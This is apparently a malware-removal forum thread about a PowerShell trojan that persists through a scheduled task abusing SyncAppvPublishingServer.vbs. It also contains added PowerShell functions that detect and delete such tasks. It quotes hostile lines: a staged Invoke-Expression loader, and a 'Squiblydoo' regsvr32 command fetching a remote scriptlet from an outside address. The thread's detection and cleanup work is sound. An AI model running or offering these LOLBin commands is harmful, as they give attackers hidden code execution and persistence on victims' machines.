PowerShell/Agent.AEW trojan keeps coming back after cleaning and reboot



  • Administrators
5 minutes ago, Shogun1 said:

I have the folder C:\Windows\System32\Tasks in my windows 11 and tried to erase.

I guess you were saying that, but I couldn't erase it! My question is: did you mean all of that folder, or did I misread that?

Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices


@Marcos, I found an earlier variant of this attack tracking to 10/2021. This one wouldn't require admin privileges. Details posted below. Let's analyze:

1. The attacker created a Logs folder in the %LocalAppData% directory. He then dropped a system-logs.txt file there.

2. He then leveraged the legitimate Windows system script SyncAppvPublishingServer.vbs to run a PowerShell script at task start time.

Quote

Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;hackbacktrack XoBJLWeei4NqeQuFneR9fArkoDLpp4Tj+YZu2tRZg3I=

-Log Details-
Protection Event Date: 10/6/21
Protection Event Time: 1:11 PM
Log File: 2b7dad48-26d9-11ec-87a2-bc5ff42b1b34.json

-System Information-
OS: Windows 10 (Build 19042.985)
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blocked, -1, -1, 0.0.0, ,

-Website Data-
Category: RiskWare
Domain: ai.backend-chat.com
IP Address: 172.67.170.251
Port: 443
Type: Outbound
File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

  https://forums.malwarebytes.com/topic/279614-riskware-block-aibackend-chat/

EDIT - Per OP's posted Autoruns text:

Quote

+ "\Microsoft\Windows\NetService\Network\NetServices"    ""    "(Verified) "    "c:\windows\system32\syncappvpublishingserver.vbs"    "12/7/2019 5:10 AM"    "0/73"

Appears this bugger has "been flying under the Eset radar" for some time.

Oh, my. There it is:

https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/md/Syncappvpublishingserver.exe.md

Edited by itman

Also came across a Meterpreter remote attack using "Squiblydoo" technique via SyncAppvPublishingServer.vbs.

Quote
SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.254.158:8080/jnQl1FJ.sct scrobj.dll"

(Images from the linked post: SyncAppvPublishingServer – Regsvr32; SyncAppvPublishingServer – Meterpreter via Regsvr32)

https://pentestlab.blog/tag/syncappvpublishingserver/

Edited by itman
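The two posts above describe the same persistence trick from two angles: a scheduled task whose action is the signed SyncAppvPublishingServer.vbs, with either a staged second-stage line pulled out of a dropped text file (the NetServices task) or a regsvr32 scriptlet fetched over HTTP (the Squiblydoo variant). The PowerShell below is an added example, not code from the thread or from ESET or Malwarebytes: it parses a task definition, flags actions that run that script, and extracts the staged file path or scriptlet URL so the second stage can be collected. The sample task XML is constructed to mirror the task quoted earlier (only the script path and argument are taken from the thread); Get-LolbinTaskIndicators and Find-LolbinTasks are this example's own names. The premise that the .vbs concatenates its argument into the PowerShell command line it launches, which is why the payloads open with `n;` or `Break;` to close off the script's own statement, follows the LOLBAS entry linked above.

```powershell
# Added example (not from the thread): find scheduled tasks whose action runs
# SyncAppvPublishingServer.vbs and pull out the PowerShell it is used to launch.
# The sample task XML below is constructed; function names are this example's own.

# Per the LOLBAS entry, the .vbs builds its PowerShell command line from its
# argument, so everything in <Arguments> is attacker-controlled code.
$LolbinPattern = 'syncappvpublishingserver\.vbs'

function Get-LolbinTaskIndicators {
    param(
        [Parameter(Mandatory)] [xml] $TaskXml,          # a Task Scheduler XML definition
        [string]                     $TaskPath = '<unknown>'
    )
    $ns = New-Object System.Xml.XmlNamespaceManager($TaskXml.NameTable)
    $ns.AddNamespace('t', 'http://schemas.microsoft.com/windows/2004/02/mit/task')

    foreach ($exec in $TaskXml.SelectNodes('//t:Actions/t:Exec', $ns)) {
        $cmd     = [string] $exec.Command
        $cmdArgs = [string] $exec.Arguments
        if ($cmd -notmatch $LolbinPattern) { continue }

        $payload = $cmdArgs.Trim().Trim('"')
        # Staged second stage, as in the NetServices task: one line of a dropped
        # text file is read and handed to Invoke-Expression.
        $reads   = $payload -match 'Get-Content\s+"?([^"|;]+?)"?\s*\|'
        $staged  = if ($reads) { $Matches[1] } else { $null }
        # Squiblydoo variant: regsvr32 fetching a scriptlet over HTTP.
        $sct     = $payload -match 'regsvr32[^;]*?/i:(https?://\S+)'
        $sctUrl  = if ($sct) { $Matches[1] } else { $null }

        [pscustomobject]@{
            TaskPath     = $TaskPath
            Command      = $cmd
            Payload      = $payload
            StagedFile   = $staged
            UsesIex      = [bool]($payload -match '\b(iex|Invoke-Expression)\b')
            ScriptletUrl = $sctUrl
        }
    }
}

# Constructed sample mirroring the task quoted in this thread (script path and
# argument from the FRST line; the rest is a minimal task definition).
$sampleTaskXml = [xml] @'
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\SyncAppvPublishingServer.vbs</Command>
      <Arguments>"n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a"</Arguments>
    </Exec>
  </Actions>
</Task>
'@

Get-LolbinTaskIndicators -TaskXml $sampleTaskXml -TaskPath '\Microsoft\Windows\NetService\Network\NetServices' | Format-List

function Find-LolbinTasks {
    # Live sweep of the on-disk task store (run elevated to read every file).
    $store = Join-Path $env:SystemRoot 'System32\Tasks'
    Get-ChildItem -LiteralPath $store -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $doc = New-Object System.Xml.XmlDocument
        try { $doc.Load($_.FullName) } catch { return }   # skip unreadable or non-XML entries
        Get-LolbinTaskIndicators -TaskXml $doc -TaskPath $_.FullName.Substring($store.Length)
    }
}
# Find-LolbinTasks | Format-List
```

Against the sample, StagedFile comes back as C:\Users\User\AppData\Local\logs\system-logs.txt and UsesIex as True; fed the Squiblydoo argument from the pentestlab post, ScriptletUrl would be the http://192.168.254.158:8080/jnQl1FJ.sct URL. Walking the task store on disk rather than Explorer's view of the folder is deliberate: several posts in this thread show the folder looking empty while the task is still registered, and the same sweep surfaces any sibling tasks that reuse the trick.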

11 hours ago, Marcos said:

Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices

Hey there Marcos,


I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network

but there is no file or folder called \NetServices after \Network; it is empty or hidden! What should I do in this case?

Regards,


12 hours ago, Shogun1 said:

I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network

but there is no file or folder called \NetServices after \Network; it is empty or hidden! What should I do in this case?

Open Windows Task Scheduler. Then open Task Scheduler Library folder.

Perform the following:

1. Open Microsoft folder.

2. Open Windows folder.

Navigate downward until the NetService folder is found. Open the NetService folder. Take a screenshot of what is displayed and attach it to your next reply.


14 minutes ago, Shogun1 said:

Here is the screenshot of what you asked,

Repeat the same procedure. Right-click on NetServices and then select Delete. At this point, this scheduled task should no longer run at system startup time.

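The click-through above can also be done from an elevated PowerShell prompt, which sidesteps the confusion over the C:\Windows\System32\Tasks folder looking empty: Get-ScheduledTask asks the scheduler service rather than Explorer. The function below is an added example, not ESET's or itman's procedure. It exports the task definition first so a sample survives for submission, stops any running instance, unregisters the task, and then verifies that both the registration and the on-disk file are gone. The task path is the one named in this thread; the export folder under the desktop and the name Remove-MaliciousTask are assumptions.

```powershell
# Added example (not from the thread): remove a malicious scheduled task from an
# elevated PowerShell session, keeping a copy of its definition for submission.
# Export folder and function name are assumptions; the task path is from this thread.

function Remove-MaliciousTask {
    param(
        [Parameter(Mandatory)] [string] $TaskPath,   # folder, with slashes: '\Microsoft\Windows\NetService\Network\'
        [Parameter(Mandatory)] [string] $TaskName,   # task name: 'NetServices'
        [string] $ExportDir = (Join-Path $env:USERPROFILE 'Desktop\task-samples')
    )
    # Ask the scheduler service, not the Tasks folder on disk: Explorer may show
    # the folder as empty while the task is still registered.
    $task = Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName -ErrorAction SilentlyContinue
    if (-not $task) {
        Write-Warning "Task $TaskPath$TaskName is not registered."
        return $null
    }

    # Preserve the definition (LOLBin action and its argument) before deleting it.
    New-Item -ItemType Directory -Force -Path $ExportDir | Out-Null
    $safeName = $TaskName -replace '[\\/:*?"<>|]', '_'
    $xmlPath  = Join-Path $ExportDir "$safeName.xml"
    Export-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName |
        Set-Content -LiteralPath $xmlPath -Encoding Unicode

    # Stop any running instance, then delete the registration without prompting.
    Stop-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName -ErrorAction SilentlyContinue
    Unregister-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName -Confirm:$false

    # Verify: neither the registration nor the on-disk definition should remain.
    $stillRegistered = Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName -ErrorAction SilentlyContinue
    $onDisk = Join-Path (Join-Path $env:SystemRoot 'System32\Tasks') ($TaskPath.TrimStart('\') + $TaskName)

    [pscustomobject]@{
        Task       = "$TaskPath$TaskName"
        ExportedTo = $xmlPath
        Removed    = (-not $stillRegistered) -and (-not (Test-Path -LiteralPath $onDisk))
    }
}

Remove-MaliciousTask -TaskPath '\Microsoft\Windows\NetService\Network\' -TaskName 'NetServices'
```

The later cleanup in this thread, where two further tasks used the same trick, is this function called once per task path. The staged file the task reads (under %LocalAppData%\Logs in the earlier variant) is a separate artifact: collect it alongside the exported XML before deleting it, since the task definition alone does not contain the second stage.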

3 minutes ago, itman said:

Repeat the same procedure. Right-click on NetServices and then select Delete. At this point, this scheduled task should no longer run at system startup time.

Done and deleted it from 1 laptop and will perform the same thing on my other 2 laptops as well to see what's new!


Please stand by for my next move in future replies :)


@itman,


Your trick worked and the notification has gone completely, but I have ESET Staff asking me for more info and further investigation to determine whether I have a malware infection or not!

Thanks for your time and help, dude.


  • ESET Staff

I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same LOLBin trick. It is not uncommon for these PowerShell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted.


  • 1 month later...
On 5/6/2022 at 2:42 AM, JamesR said:

I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same LOLBin trick. It is not uncommon for these PowerShell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted.

Hi, could you kindly look at this thread: https://forum.eset.com/topic/32653-annoying-powershellagentaew-on-each-start-need-assitence/#comment-152054


  • 1 month later...
On 5/4/2022 at 8:39 PM, Shogun1 said:

Hey Ted,


I have the folder C:\Windows\System32\Tasks in my Windows 11 and tried to erase.

I guess you were saying that, but I couldn't erase it! My question is: did you mean all of that folder, or did I misread that?

The same virus. It seems to be caused by an UltraEdit cracker.


  • Administrators
2 hours ago, Kevin999 said:

I tried to recover the SyncAppvPublishingServer.vbs from EIS' quarantine, and I will send it to you later. @Marcos

The detection is correct. The other script was a standard vbs file which is part of Windows installations.
